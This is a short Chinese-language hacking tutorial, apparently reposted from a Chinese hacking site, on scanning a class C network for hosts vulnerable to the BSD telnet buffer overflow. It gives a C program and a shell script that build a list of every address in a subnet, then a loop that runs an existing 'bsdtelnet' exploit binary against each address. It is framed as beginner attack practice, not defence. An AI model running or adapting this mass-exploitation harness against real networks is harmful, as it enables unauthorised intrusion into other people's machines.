菜鸟黑客上路-关于扫描的技巧与实战
一个简单的扫描一个C类IP里BSDTELNET漏洞机器例子,下面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:
$cat num.c
main()
{
int x;
for (x=0;x<256;x++)
printf ("%d\n",x);
}
上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以./num >>num.txt来得到这个文本.
#!/bin/sh
echo -n "please ernter a ip:"
read ipip
list=`cat num.txt`
for listip in $list
do
echo $ipip.$listip
echo >>iplist.txt $ipip.$listip
done
上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C段地址以便与下面的LISTIP合并成真正的ip,list=''cat num.txt''是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下:
#!/bin/sh
list=`cat iplist.txt`
for listip in $list
do
./bsdtelnet -c $listip
done
list=''cat iplist.txt''读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.
文章转载地址:http://www.cnpaf.net/Class/hack/06101110492126711910.html
